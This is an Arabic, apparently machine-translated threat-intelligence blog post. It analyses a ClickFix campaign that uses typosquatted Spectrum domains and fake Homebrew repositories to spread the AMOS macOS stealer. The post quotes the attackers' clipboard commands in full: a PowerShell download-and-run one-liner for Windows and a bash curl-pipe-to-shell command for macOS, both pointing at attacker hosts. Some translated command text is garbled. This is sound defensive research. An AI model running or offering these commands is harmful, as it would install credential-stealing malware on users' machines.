🚀 لقد رفعت CloudSek جولة B1 من السلسلة B1 بقيمة 19 مليون دولار - تعزيز مستقبل الأمن السيبراني التنبؤي
اقرأ المزيد
كشف باحثو CloudSek عن حملة معقدة تستفيد من نطاقات «Spectrum» المطبعية لنشر متغير Atomic macOS Stealer (AMOS) الجديد. يستخدم الهجوم، متنكرًا في صورة التحقق من CAPTCHA، حمولات ديناميكية مصممة خصيصًا لنظام تشغيل الضحية - لسرقة كلمات المرور وتجاوز أمان macOS وتنفيذ البرامج الضارة. ومن خلال التعليقات باللغة الروسية الموجودة في الكود ومنطق التسليم المعيب، تعكس الحملة كلاً من الطموحات المتزايدة عبر المنصات والتنفيذ المتسرع. تعمق في كيفية عمل هذا التهديد متعدد المنصات - ولماذا يجب أن تظل مؤسستك في حالة تأهب.
يمكنك مراقبة مؤسستك والدفاع عنها بشكل استباقي ضد التهديدات من الويب المظلم باستخدام CloudSek xviGil.
Schedule a Demoتم الكشف عن حملة جديدة لنسخة Atomic macOS Stealer (AMOS)، للاستفادة من النطاقات المطبعية التي تحاكي Spectrum، وهي شركة اتصالات مقرها الولايات المتحدة. تستخدم الحملة طريقة Clickfix وتقدم حمولات مختلفة بناءً على نظام تشغيل الضحية. والجدير بالذكر أن مستخدمي macOS يحصلون على برنامج نصي ضار مصمم لسرقة كلمات مرور النظام وتنزيل متغير AMOS لمزيد من الاستغلال. يستخدم البرنامج النصي أوامر macOS الأصلية لجمع بيانات الاعتماد وتجاوز آليات الأمان وتنفيذ الثنائيات الضارة. تشير التعليقات باللغة الروسية في شفرة المصدر إلى تورط مجرمي الإنترنت الناطقين بالروسية. يشير المنطق الذي يتم تنفيذه بشكل سيئ في مواقع التسليم، مثل التعليمات غير المتطابقة عبر المنصات، إلى بنية تحتية تم تجميعها على عجل. تسلط هذه الحملة الضوء على الاتجاه المتزايد في هجمات الهندسة الاجتماعية متعددة المنصات التي تستهدف المستخدمين من المستهلكين والشركات.
خلال دورة اكتشاف وإسناد البنية التحتية الروتينية للمهاجمين، اكتشفنا عددًا من مواقع التسليم التي تحمل عنوان Clickfix والتي وُجد أنها تقوم بطباعة Spectrum، وهي شركة مقرها الولايات المتحدة تقدم خدمات للتلفزيون الكبلي، والوصول إلى الإنترنت، وأمن الإنترنت، والخدمات المُدارة، والهاتف المحمول، والاتصالات الموحدة.
عندما تنقر الضحية على «التحقق البديل»، يتم نسخ الأمر إلى الحافظة، ويتم عرض التعليمات للضحية لاتباعها. تمامًا مثل أي حملة Clickfix أخرى.
ومع ذلك، بعد إجراء مزيد من التحقيق، اكتشفنا أن موقع الويب قدم ردودًا مختلفة بناءً على وكلاء مستخدمين مختلفين.
الحافظة - وكيل مستخدم غير macOS
بوويرشيل - لا يوجد ملف شخصي - تجاوز سياسة التنفيذ - الأمر «$file = [System.IO.path] ::الجمع ($env: Temp، 'api.ps1')؛ استدعاء - طلب الويب - عنوان URL 'https://cf-verifi[.]pages[.]dev/i.txt' - ملف الخروج $file؛ & $file» # Cloudflare
هذه إحدى طرق التسليم الأكثر استخدامًا لمستخدمي Windows.
الحافظة - وكيل مستخدم macOS
/bin/bash -c «$ (curl -fSSL https://applemacios[.]com/getrur/install.sh)» # التحقق من نظام التشغيل macOS #248187 المصادق عليه بواسطة Cloudflare. حقوق النشر محفوظة لشركة كلاود فلير 2025.
/بين/باش -c» ... «: هذا يخبر النظام بـ قم بتشغيل الأمر داخل علامات الاقتباس باستخدام قذيفة باش.
<URL>كيرل -FSSL:
ناتج curl (أي البرنامج النصي install.sh) هو تم تنفيذه على الفور بواسطة Bash.
محتويات ملف install.sh
عند تحليل الملف المحفوظ كـ «تحديث» ضمن دليل «tmp»، اكتشفنا أن البرامج الضارة تنتمي إلى عائلة Atomic macOS Stealer (AMOS). شوهدت متغيرات AMOS مثل Poseidon و Odyssey في البرية مؤخرًا، واكتسبت زخمًا بين مجرمي الإنترنت.
بعد كشف CloudSek عن تكتيكاتها وشبكتها، تحول المتسللون إلى طريقة توزيع جديدة: إعلانات ضارة لمستودعات GitHub المزيفة التي تستهدف المطورين الذين يستخدمون HomeBrew. (h/t جيروم سيجورا - Malwarebytes)
يعكس تسلسل الهجوم المرصود الحالة التي تم التحقيق فيها سابقًا، والتي تتضمن نصًا خادعًا («install [.] sh») يجلب حمولة «تحديث»، وهي نوع من AMOS. تتكشف عملية العدوى على النحو التالي:
في 6 يونيو 2025، أنشأ ممثل التهديد مستودع «Homebrew» المزيف.
تم تنفيذ هذه الالتزامات ببساطة لاستبدال خوادم الأوامر والتحكم القديمة بخوادم جديدة.
كما نرى أعلاه، قام ممثل التهديد بإزالة C2 الحالي وإضافة مسار تثبيت Homebrew الشرعي (raw github)، والذي من المرجح أن يثبت صحة الإعلانات الخاطئة.
في وقت لاحق، تم استبدال عنوان URL الشرعي بـ C2s التي يتحكم فيها المهاجم. تمت إضافة جميع IOCs من المستودع إلى الجدول في نهاية هذا التقرير.
أثناء فحص الكود المصدري لصفحة التسليم، صادفنا بعض التعليقات باللغة الروسية، مما يشير إلى أنه من المحتمل أن يتم نشر البرامج الضارة عن طريق مجرمو الإنترنت الناطقون بالروسية. باستخدام هذه التعليقات كنقطة محورية، إلى جانب معلمات HTTP الأخرى، تمكنا من العثور على IOFAs بالإضافة إلى IOCs.
تحتوي صفحات التسليم المعنية لحملة AMOS المتغيرة هذه على أخطاء في كل من البرمجة ومنطق الواجهة الأمامية. بالنسبة لوكلاء مستخدمي Linux، تم نسخ أمر PowerShell. علاوة على ذلك، تم عرض التعليمات «اضغط مع الاستمرار على مفتاح Windows+ R» لكل من مستخدمي Windows و Mac.
Take action now
CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.
Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.
Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.
Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.
Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.